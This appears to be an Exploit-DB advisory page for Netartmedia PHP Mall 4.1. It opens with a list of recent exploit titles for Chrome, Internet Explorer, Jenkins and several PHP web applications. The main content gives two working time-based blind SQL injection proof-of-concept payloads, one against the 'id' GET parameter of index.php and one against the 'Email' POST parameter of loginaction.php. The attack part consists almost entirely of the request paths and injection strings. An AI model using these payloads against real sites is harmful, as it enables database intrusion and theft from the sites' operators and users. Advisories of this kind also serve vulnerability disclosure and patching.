
16 changes to exploits/shellcodes libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons Google Chrome < M73 - Double-Destruction Race in StoragePartitionService Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML Microsoft VBScript - VbsErase Memory Corruption Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject Google Chrome < M73 - MidiManagerWin Use-After-Free Google Chrome < M73 - FileSystemOperationRunner Use-After-Free Advanced Host Monitor 11.92 beta - Local Buffer Overflow Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit) TheCarProject v2 - Multiple SQL Injection TheCarProject 2 - Multiple SQL Injection Gila CMS 1.9.1 - Cross-Site Scripting MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting eNdonesia Portal 8.7 - Multiple Vulnerabilities Netartmedia Event Portal 2.0 - 'Email' SQL Injection Netartmedia PHP Mall 4.1 - SQL Injection Netartmedia Real Estate Portal 5.0 - SQL Injection
22 lines
No EOL
858 B
Text
22 lines
No EOL
858 B
Text
# Exploit Title: Netartmedia PHP Mall 4.1 - Multiple SQL Injection
|
|
# Date: 19.03.2019
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: https://www.netartmedia.net/mall/
|
|
# Demo Site: https://www.phpscriptdemos.com/mall/
|
|
# Version: 4.1
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
# Description: PHP Mall is one of the first multi-stores and multi-vendors
|
|
php scripts (offered since 2006) and successfully used on many websites
|
|
today.
|
|
|
|
----- PoC 1 : SQLi (time-based blind) -----
|
|
# Request: http://localhost/[PATH]/index.php
|
|
# Parameter: id (GET)
|
|
# Payload: id=1 AND SLEEP(5)&item=&lang=en&mod=details
|
|
|
|
----- PoC 2 : SQLi (time-based blind) ----
|
|
# Request: http://localhost/[PATH]/loginaction.php
|
|
# Parameter: Email (POST)
|
|
# Payload: Email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z' OR SLEEP(5)
|
|
AND 'tOoX'='tOoX&Password=g00dPa$$w0rD&lang=en |